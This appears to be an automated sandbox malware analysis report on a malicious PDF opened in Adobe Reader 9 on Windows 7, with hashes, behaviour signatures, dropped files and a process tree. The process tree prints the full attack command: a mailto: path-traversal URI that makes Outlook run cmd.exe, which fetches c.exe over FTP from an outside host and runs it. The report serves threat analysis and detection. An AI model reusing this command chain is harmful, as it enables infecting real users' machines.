Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    12-02-2024 15:25

General

  • Target

    977c984367355f590a8bb159f76d94d9.pdf

  • Size

    14KB

  • MD5

    977c984367355f590a8bb159f76d94d9

  • SHA1

    1a1a1c77da9a62caae618745be5e2dac76afe56f

  • SHA256

    25830eecbe144320cf5e74614e967b0f272a4362a801665258ad67c1255bb7d2

  • SHA512

    2af47e7cf4b73ce007253206bf256d2c10d8969202fd04d9c7e83c06c0b4adecc7a4d926536c9b36b10d71eff1eca76ce414f2d0918039595bd4c76796c1b47b

  • SSDEEP

    192:vJs0bjJqccyZxcqXtTJWuZ2yvO9Y+j1MK8kM7kMNzpFh4lMJ:R5pqwttTIs0pCfNTpr4qJ

Score
5/10

Malware Config

Signatures

  • Drops file in System32 directory 14 IoCs
  • Drops file in Windows directory 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\977c984367355f590a8bb159f76d94d9.pdf"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2956
    • C:\PROGRA~2\MICROS~1\Office14\OUTLOOK.EXE
      "C:\PROGRA~2\MICROS~1\Office14\OUTLOOK.EXE" -c IPM.Note /m "mailto:test%25../../../../../../../../windows/system32/cmd%22.exe%22%22%20/c%20/q%20%22@echo%20off&echo%20dinozavr_ftp0%3Ed&echo%20sDs1LSWZ%3E%3Ed&echo%20binary%3E%3Ed&echo%20GET%20/i%20c.exe%3E%3Ed&echo%20bye%3E%3Ed&ftp%20-is:d%20cgi18.hqhost.net%3Enul&del%20/q%20d&@start%20c.exe&%22%20%22&%22%20%22nul.bat%22.cmd"
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious behavior: GetForegroundWindowSpam
      PID:2108

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

    Filesize

    230KB

    MD5

    2592d0de4e35b4cb0091316d3654e491

    SHA1

    31a82f183f4a9668b49189c12ab50382f02c952a

    SHA256

    e34318f3ccba08f03adeb8f7ec9d780340d4401d2f8e7ec4d4c81facad5495f1

    SHA512

    c8b6f727fe538bca34204111205f2f579b3e55d5490e52ac5a0ed950ae740a178b27693bbd0e5a2ee3b172fdbe3ec1a5468f1e9de0a272dc75a3dc22a132a72e

  • C:\Users\Admin\AppData\Local\Microsoft\Outlook\mapisvc.inf

    Filesize

    1KB

    MD5

    48dd6cae43ce26b992c35799fcd76898

    SHA1

    8e600544df0250da7d634599ce6ee50da11c0355

    SHA256

    7bfe1f3691e2b4fb4d61fbf5e9f7782fbe49da1342dbd32201c2cc8e540dbd1a

    SHA512

    c1b9322c900f5be0ad166ddcfec9146918fb2589a17607d61490fd816602123f3af310a3e6d98a37d16000d4acbbcd599236f03c3c7f9376aeba7a489b329f31

  • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

    Filesize

    3KB

    MD5

    9edff29076fc02b73344ab9c097e8843

    SHA1

    92ac67ab37a22cde2fe960a11d4f85c334139ea7

    SHA256

    08e08eb12cf799633f081ff6b9df8d6dc023448078afb0a6a80607b6d2bed43d

    SHA512

    0ccb3f99f31b3307653904e21e2ad82894433019fb52946d83217af2526d52c5048d484f81caf4cf860632adb5fa712cb3b4cda41da9ea0197d426db64c61bb9

  • memory/2108-2-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2108-3-0x0000000070C2D000-0x0000000070C38000-memory.dmp

    Filesize

    44KB

  • memory/2108-143-0x0000000070C2D000-0x0000000070C38000-memory.dmp

    Filesize

    44KB

  • memory/2956-0-0x0000000002C00000-0x0000000002C76000-memory.dmp

    Filesize

    472KB